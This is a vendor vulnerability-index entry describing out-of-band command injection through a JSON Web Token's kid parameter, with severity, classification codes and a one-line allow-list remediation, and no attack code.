PCI v3.2-6.5.1
CAPEC-88
CWE-78
ISO27001-A.14.2.5
WASC-31
OWASP 2013-A1
OWASP 2017-A1
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

JWT kid Parameter Out of Band Command Injection

Severity:
Critical
Summary

Invicti detected an Out of Band Command Injection vulnerability inside the kid parameter of a JSON Web Token. It was detected by capturing a DNS A request, which occurs when input data is interpreted as an operating system command.

  • Use an allow-list of valid values and disallow any other input.
  • Impact
    Remediation
    Required Skills for Successful Exploitation
    Actions To Take
    Vulnerability Index

    You can search and find all vulnerabilities

    Select Vulnerability
    Thank you! Your submission has been received!
    Oops! Something went wrong while submitting the form.

    Featured resources

    Blog

    Strengthening enterprise application security: Invicti acquires Kondukto

    Blog

    Modern AppSec KPIs: Moving from scan counts to real risk reduction

    Blog

    Friends don’t let friends shift left: Shift smarter with DAST-first AppSec

    Blog

    Vibe talking: Dan Murphy on the promises, pitfalls, and insecurities of vibe coding

    Blog

    What lies ahead for CMS.

    Blog

    How to integrate CMS with other tools.

    Blog

    Improve user experience through CMS.

    Blog

    How CMS can benefit e-commerce.

    Blog

    Stay updated on CMS trends.

    Blog

    Tips for improving CMS performance.

    Blog

    Learn how to secure your CMS.

    Blog

    Explore the advantages of CMS.

    Blog

    A comprehensive guide to CMS.

    Build your resistance to threats. And save hundreds of hours each month.